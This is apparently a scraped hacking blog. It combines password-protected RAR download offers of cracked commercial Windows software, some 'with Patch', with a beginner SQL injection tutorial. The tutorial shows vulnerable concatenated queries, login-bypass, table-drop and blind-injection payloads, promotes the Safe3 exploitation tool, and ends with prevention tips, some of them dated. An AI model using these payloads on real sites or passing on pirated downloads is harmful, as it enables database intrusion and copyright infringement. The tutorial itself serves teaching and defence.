 Windows Vista Compatible. RegistryBooster is now fully Windows Vista compatible and can still be run on Windows XP. The program automatically adapts itself according to the version of your operating system so you do not have to configure any manual settings.
  Safe and Trusted. Avoid crashes, seizures, slow downs and error messages with the safest and most trusted solution from a leading software vendor.

Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                          
                                             Download the file Click Here

Password of RAR File : brain hackers


MProjector 3.1.1k for Free Download with Patch Full Version

MProjector 3.1.1k for Free Download

MProjector enables you to build rich-internet applications for the desktop using Adobe Flash. If you know Flash and a little ActionScript, then creating Mac and Windows desktop toys, widgets, and applications is just a few clicks away.

MProjector… Crank it to 11
You can make amazing stuff.
That's right. For Windows AND Mac!
Pixel-perfect transparency.
Know Flash? You know mProjector!
It just works.
Faster downloads.
Multiple windows.
Get up to speed quickly.
Set your widget free.
Growing community.
Custom services available.

1. You can make amazing things.
mProjector transforms your Flash web applications into Desktop applications. Make connected widgets, games, branded news readers, screen buddies, autorun CD installers, system tray or toaster popup alert applications. Make happy clients... and more of them.

2. That's right. For Windows and Mac!
mProjector supports both Windows and Mac OS X with more cross-Platform APIs and unmatched cross-platform functionality. Only mProjector supports Flash-Shaped windows on Mac and Windows, and unlike our competitors we use our software (mProjector) to build mProjector. Maximize your audience with minimal effort.

3. Pixel Perfect Transparency.
mProjector now supports dynamic Flash-shaped windows, alpha channels, and anti-aliasing for both Windows and Mac OS X. Whatever you draw on the Flash Stage will draw directly on the desktop -- in real time. Old-school development tools and the SWF2EXE competition can't touch this.

4. Know Flash? You know mProjector.
So; you know Flash. What does it take to learn mProjector, you say? Well, mProjector integrates right into the Flash IDE and looks as if it shipped with it. So your "learning curve" is more like a learning blip

5. It just works.
What’s that, you say? On the PC, you've found several other SWF2EXE tools? With just as many features. Maybe "more". And therein lies the problem. Can you say "bloated", "overly complex", "buggy", "Windows-Only", "huge file sizes"? Unfortunately they can, and do. You don't have to worry about these issues with Flash so why should you with your desktop application creator?

6. Fastest Downloads
File size is still important. A quick and easy download can be the difference between user adoption and disinterest. mProjector applications are often less than megabyte, much less.
Mac Applications: 300 Kb zipped, 800 Kb expanded.
Windows EXEs: 275 Kb zipped, 300 Kb expanded.

7. Multiple Windows.
mProjector supports on-the-fly window creation so your application is not limited to one window or a set of predefined windows. Each window can play its own SWF. And windows can communicate with each other via custom-defined synchronous functions. So powerful you could make your own widget engine!
8. Get up to speed quickly.

We've worked hard on making mProjector "just work" but of course you'll have questions. So, We've put a lot of effort into high quality, readily accessible documentation and samples.

9. Set your widget free.
Making a widget that is trapped in a Dashboard or Konfabulator layer just isn't the same. Out of site, out of mind. mProjector lets you build completely standalone widgets..

10. Growing user community.
mProjector is building a diverse user community. Movie studios are using mProjector to create the med widgets to support movie and DVD releases. EUFA.com (European Football Association) has built an alert application to deliver up-to-the-minute news and scores to their fans. Developers are building shareware and full-blown application to manage and deliver multimedia content. Drop by our Forum to get ideas.

Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                          
                                             Download the file Click Here

Password of RAR File : brain hackers


FolderIco for Free Download full version

FolderIco for Free Download


FolderIco: allows to customize the icon of every Windows folder in one click!

Organise your folders more easily
Don't you know how to change standard yellow folder to a colourful and bright one? With FolderIco, give some color to Windows folders. With just a one click, colorize your folders, and discover a new intuitive way to classify your files. A quick look is now enough to identify the folder you are looking for!


Classify your folders by priority
You can now classify your folders by priority. Red is an important folder, orange is urgent, green is no action needed... Choose the attributes that you like, so you'll never delete an important folder in error.

A fast and light tool
FolderIco is a very light software, that doesn't stay in memory. It uses a native functionality of Windows to be more efficient. Discover its simplicity: with a single right-click on a folder you change it icon!

Integration with Windows Explorer
FolderIco is integrated into your Windows Explorer! One right-click on any folder and FolderIco is ready to changing your folder's icon.

Translated into your language
FolderIco is translated to the following languages: English, Russian, Romanian, French, Polish, German, Spanish, Simplified Chinese, Greek, Danish, Swedish, Portuguese, Dutch, Hungarian, Italian, Arabic, Czech, Finnish, Norwegian.

Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                         
                                             Download the file Click Here

Password of RAR File : brain hackers

Talk it Software for Free Download Full Version


Talk It!, also called TalkAny, was a popular text-to-speech (TTS) software by SoftVoice, Inc. and was originally included in the Windows 95 version of Microsoft Plus! under the name of "Microsoft Plus! for Kids". It was used to teach children pronunciation of words and for simple text-to-speech uses, including narration and accessibility.

Talk It! came in two languages, Spanish and English. It was one of the first programs to properly pronounce two different languages.
 
Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                           
                                             Download the file Click Here

Password of RAR File : brain hackers



How does your Website becomes vulnerable to SQL Injection?



Developer is the one and only reason for the SQL Injection Vulnerability. While developing the Web Application, he fails to handle some vulnerability(because he doesn't know about it. Don't be one of them. If you are Web Application developer, then you must read these security techniquest in order to overcome the SQL Injection Vulnerability.


Reason 1:Incorrectly filtered escape characters
In this case, the developer fails to filter the input for escape characters and He directly pass the input to SQL statement. This results in vulnerability.

Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"

This code will check the username in datbase. An attacker can use malicious codes to inject his own query.
for eg:

    ' or 1=1

he can enter the above code instead of the username. So the SQL statement will become like this:

    SELECT * FROM `users` WHERE `name` = '' OR 1=1;


He can use the comments to block the rest of the query .
for eg:

    ' or 1=1 --

so the query will become like this:
SELECT * FROM `users` WHERE `name` = '' OR 1=1 -- ;

Here name=' ' is false. But '1'='1' is true. Here we used OR operator. So it is enough to one condition is true. So this will query bypass the login.

Reason 2:Incorrect Type Handling
When the developer fails to check for the data type of input, it will raise the Vulnerability of Database.

Let us consider this query.
Statement=”Select * from `userid` where `id`=”+inputId+”;” ;
Here Id refers a number data. But the inputId is given directly without checking for the type. So attacker can enter any type of data, he can enter a string.

For example if he input as
1; drop table `userid`;
The query will become as
Select * from `userid` where `id`=1; drop table `userid`;

Reason 3: Blind SQL Injection(Condtion Response)
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.

This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established

Conditional responses
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to a SQL injection
Using this , an attacker can find the column and full datbase details.

UPDATE: Safe3 Sql Injector v8.6

Safe3 developers have brought us the updated Safe3 Sql Injector version 8.3.


“Safe3 is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.”

This update fixes a lot of bugs.

Download Safe3 Sql Injector v8.6 (Safe3SI v8.6) here.

SQL Inject Me -SQL Injection Tool to test the Vulnerability for Pen Testers

So far i have written what is sql Injection, How to prevent SQL Injection? .  In this post, i am going to introduce a new SQLi tool for Pen Testers and Webmasters.
The tool name is SQL Inject Me.
   
What is SQL Inject Me?
    SQL Inject Me is Mozilla addon that is used to test the SQL Injection Vulnerability of Web Application.  It reduces the workload of Manual SQL Injection Test.  This is especially designed for Pen Testers and Web Masters not for hackers.



Download it From here:

    https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/

How it works?
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.


The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.


How to Prevent SQL Injection Vulnerability? Website Security



Hi webmasters and budding Pen Testers, I hope you read my article about SQL Injection. Our Aim is to provide Security, right? So here is the prevention techniques.



 

Use Prepared Statements:

Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.

  • In Java you can use PreparedStatement() with bind variables 
  • In .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables
  • In PHP you can use PDO with strongly typed parameterized queries (using bindParam()).

You can use Stored Procedures also.  Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.

Use Less Privilege Account:
Use less privilege account for database connections.  That account should not be able to drop the able or create.  Maintain two separate accounts.

Escape user input.

This powerful function rejects the possibility of many clever techniques used by the intruders. php provides escpe string function.  Later we will discuss about the syntax.

Assume magic quotes is always off.

When the magic_quotes_gpc variable is off, this can prevent some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and what is worse - sometimes they are off and you don't know about it. This is why it is necessary to have code for the substitution of quotes with slashes. Here is :

$username = $_POST['username'];
$password = $_POST['password'];
if (!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}
if the magic quotes is enabled , the following problem will arise:
  •  Not all data that are supplied by the user are intended for insertion into a database. They may be rendered directly to the screen, stored in a session, or previewed before saving. This can result in backslashes being added where they are not wanted and being shown to the end user. This bug often creeps into even widely used software.[7]
  •  Not all data that are supplied by the user and used in a database query are obtained directly from sources protected by magic quotes. For instance, a user-supplied value might be inserted into a database — protected by magic quotes — and later retrieved from the database and used in a subsequent database operation. The latter use is not protected by magic quotes, and a naive programmer used to relying on them may be unaware of the need to protect it explicitly.
  • Magic quotes also use the generic functionality provided by PHP's addslashes() function, which is not Unicode aware and still subject to SQL injection vulnerabilities in some multi-byte character encodings. Database-specific functions such as mysql_real_escape_string() or, where possible, prepared queries with bound parameters are preferred.[8][9]
  • While many DBMS support escaping quotes with a backslash, the standard actually calls for using another quote. Magic quotes offer no protection for databases not set up to support escaping quotes with a backslash.
  • Portability is an issue if an application is coded with the assumption that magic quotes are enabled and is then moved to a server where they are disabled, or the other way round.
  • Adding magic quotes and subsequently removing them where appropriate incurs a small but unnecessary performance overhead.
  •  Magic quotes do not protect against other common security vulnerabilities such as cross-site scripting attacks or SMTP header injection attacks.


Install patches regularly and timely.

Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.



Use automated test tools for SQL injections.

Even if you follow the above said prevention, there will be some vulnerability.  You may not notice it.  So check the vulnerability of your web application with some kind of SQLi tools.

Try SQL inject Me tool  to test the Vulnerability of your WebSite.

See i just explained theoretically,  I didn't explain with code.  Don't worry, wait for my next post.